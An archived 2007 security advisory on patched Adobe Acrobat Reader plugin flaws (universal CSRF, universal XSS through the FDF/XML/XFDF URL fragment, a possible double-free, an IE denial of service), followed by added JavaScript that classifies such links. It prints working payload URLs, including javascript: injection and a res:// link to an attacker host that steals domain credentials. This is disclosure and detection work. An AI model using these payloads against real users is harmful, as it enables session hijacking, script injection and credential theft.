adobeplugin.txt

Posted Jan 4, 2007
Authored by Stefano Di Paola | Site wisec.it

The Adobe Acrobat Reader plugin is susceptible to session riding and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 6f8787159ec262edcfdaedc27ea3b2c37a154fdd74c3dce34a6fc9e8817c536d

Adobe Acrobat Reader Plugin - Multiple Vulnerabilities

Original Advisory:
http://www.wisec.it/vulns.php?page=9

Original Discovery and Research:
Stefano Di Paola

Contribution:
Giorgio Fedon (IE DoS, UXSS analysis)
Elia Florio (PoC and code execution analysis)

Status: Vendor Informed on 15 October 2006
Patched: Yes

Please upgrade your current version of Adobe Acrobat Reader.

_______________________________________________________

Brief Intro:

During our talk at 23C3 (Subverting Ajax) we presented some
interesting attack vectors that take advantage of the dangerous
"Prototype Hijacking" vulnerability class in browser JavaScript
frameworks. Any XSS is a good entry point for it, and a single
Universal XSS is de facto the best entry point.

Since Adobe did a great job and patched the issues reported here
in less than one month, we decided to disclose our findings during
23C3 so that the audience could better understand the risks and
impact of high-level plugin vulnerabilities (i.e. flaws in the
functional integration of the plugin with the browser, rather than
memory corruption).

There is also a possible remote code execution (RCE), but it was
not the focus of our talk.

Affected Versions:
Adobe Acrobat Reader plugin 7 (fully patched) and below

Tested On:
Firefox 1.5.0.7 and below, 2.0RC2 under Windows XP SP2
Firefox 1.5.0.7 and below, 2.0RC2 under Ubuntu 6.06
Internet Explorer SP2 under Windows XP SP2

Summary:

The Adobe Acrobat plugin for Mozilla Firefox (acroreader) can populate
the form fields of a Portable Document Format (PDF) file with an
external data set supplied through the FDF, XML, or XFDF open
parameters.
The implementation of the FDF, XML and XFDF functionality
(http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf)
in the Acrobat Reader plugin is vulnerable to several kinds of attack.
The extent of the vulnerability changes from browser to browser:

1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML and #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

______________________________________


1. Universal CSRF and session riding


This is most likely an Adobe-side issue, since all tested browsers
(IE, Firefox, Opera) were affected.
The issue is that, given a specially crafted link like this:

http://site.com/file.pdf#FDF=http://victim.com/index.html?param=...

the Adobe plugin automatically sends a request to 'victim.com' for the
page named in the 'FDF' parameter, without any user interaction.
The fragment is handled by the plugin on the client side and the request
is issued from the victim's browser session, so this can be used for a
Universal Session Riding (aka UCSRF) attack, which is a well-known
vulnerability class.
Note that the same effect is obtained with the 'XML' and 'XFDF'
parameters.


=====

2. UXSS in #FDF, #XML and #XFDF

In addition, the following request makes it possible to execute
JavaScript code inside the Firefox browser:

http://site.com/file.pdf#FDF=javascript:alert('Test Alert')

Since the script executes in the context of whichever site serves the
PDF file, this can be triggered against any such site, which makes it a
Universal Cross Site Scripting (UXSS).
UXSS is a particular type of Cross Site Scripting that is triggered by
exploiting flaws in the browser (or its plugins), instead of leveraging
vulnerabilities in insecure web sites. It is also possible to force
clients to download files by supplying:

http://site.com/file.pdf#FDF=javascript:document.location='file://C:/winnt/notepad.exe'

<Alternative_Attack>

Alternative attack using named pipes
- http://www.514.es/2006/10/exploiting_win32_design_flaws.html

In order to steal domain credentials with Internet Explorer:

http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe

By applying the techniques from the 514.es paper, we found that this
kind of URL and protocol (res://) could be used as well.

This means that Internet Explorer could also be abused, in conjunction
with the Adobe plugin, to attack internal LANs and obtain the victim's
credentials.

</Alternative_Attack>


3. Possible Remote Code Execution

There is also a possible remote code execution by leveraging a memory
corruption inside Firefox, triggered with the following request:

http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...');

It is possible to cause a double free() and to overwrite part of the
Structured Exception Handler (SEH).

Runtime vulnerability analysis:
The problem seems to be caused by a double MSVCRT.free() executed by
the Acrobat plugin.
The routine that causes Firefox to crash is reached from the call to
NP_Shutdown().

Elia Florio is credited for the runtime analysis and exploitation.

NB. The PoC for this vulnerability won't be released.

=====

4. Denial of Service (Internet Explorer only)

By supplying the following request via the web browser, it is possible
to cause a denial of service in Internet Explorer:

http://site.com/file.pdf#####...(more '#')

The application keeps waiting for more input and allocates more and
more memory.
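As an added example (not code from the advisory, and not Adobe's implementation), the following JavaScript models the open-parameter parsing the plugin performs on the URL fragment and classifies the hostile values described in sections 1, 2, the alternative attack and 4. It is written as a link-screening check; the hostnames (site.com, victim.com, evilhost, anyhost) and the sample URLs are constructed for the example, and the parser is a simplified model of the behaviour described above, not the real plugin code.

```javascript
// Added example (not from the advisory, not Adobe's code): a model of how a
// PDF viewer plugin pulls Acrobat "open parameters" out of a URL fragment,
// plus a classifier for the hostile values the advisory describes.
// Hostnames such as site.com, victim.com and evilhost are placeholders.
const IMPORT_PARAMS = ["fdf", "xml", "xfdf"]; // parameters that make the plugin fetch external form data

// Split "http://host/file.pdf#FDF=...&page=2" into the PDF URL and a map of
// open parameters. Names are matched case-insensitively (the advisory uses
// both #FDF= and #fdf=); '&' separates parameters in this model. Everything
// after '#' stays on the client: the server hosting the PDF never sees it.
function parseOpenParameters(url) {
  const hash = url.indexOf("#");
  const pdfUrl = hash === -1 ? url : url.slice(0, hash);
  const fragment = hash === -1 ? "" : url.slice(hash + 1);
  const params = new Map();
  for (const part of fragment.split("&")) {
    const eq = part.indexOf("=");
    if (eq > 0) params.set(part.slice(0, eq).toLowerCase(), part.slice(eq + 1));
  }
  return { pdfUrl, fragment, params };
}

function hostOf(url) {
  try { return new URL(url).host.toLowerCase(); } catch (e) { return null; }
}

function schemeOf(value) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(value);
  return m ? m[1].toLowerCase() : "";
}

// Return one finding per hostile pattern present in the URL (empty = clean).
function classify(url) {
  const { pdfUrl, fragment, params } = parseOpenParameters(url);
  const findings = [];

  // Section 4: a long run of '#' keeps IE waiting for input and allocating.
  const run = /#{8,}/.exec(fragment ? "#" + fragment : "");
  if (run) findings.push({ kind: "dos", detail: `${run[0].length} consecutive '#'` });

  for (const key of IMPORT_PARAMS) {
    if (!params.has(key)) continue;
    const value = params.get(key);
    const scheme = schemeOf(value);
    if (scheme === "javascript") {
      // Section 2: the script runs in the origin of the site serving the PDF (UXSS).
      findings.push({ kind: "uxss", param: key, detail: value });
    } else if (scheme === "file") {
      findings.push({ kind: "local-file", param: key, detail: value });
    } else if (scheme === "res" || /\\\\[^\\]+\\pipe\\/i.test(value)) {
      // Alternative attack: res:// or a UNC path to a named pipe on an attacker host.
      findings.push({ kind: "credential-leak", param: key, detail: value });
    } else if (scheme === "http" || scheme === "https") {
      // Section 1: a cross-site target is fetched with the victim's session, no interaction.
      const target = hostOf(value);
      if (target !== null && target !== hostOf(pdfUrl)) {
        findings.push({ kind: "csrf", param: key, detail: value });
      }
    }
  }
  return findings;
}

// Constructed sample URLs modelled on the advisory's examples.
const SAMPLES = [
  "http://site.com/file.pdf#FDF=http://victim.com/index.html?action=delete",
  "http://site.com/file.pdf#FDF=javascript:alert('Test Alert')",
  "http://anyhost/file.pdf#fdf=res://\\\\evilhost\\pipe\\apipe",
  "http://site.com/file.pdf############",
  "http://site.com/file.pdf#page=2",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const u of SAMPLES) {
    console.log(u, "=>", classify(u).map((f) => f.kind).join(",") || "clean");
  }
}
```

Run it with node to print the classification of each sample. The point the parser makes visible is that the fragment never travels in the HTTP request, so neither site.com nor a forward proxy can filter the FDF target; the full link is only visible where it is delivered (mail gateways, scanners for user-posted links) and inside the browser itself, which is why the fix has to be in the plugin.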




--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................
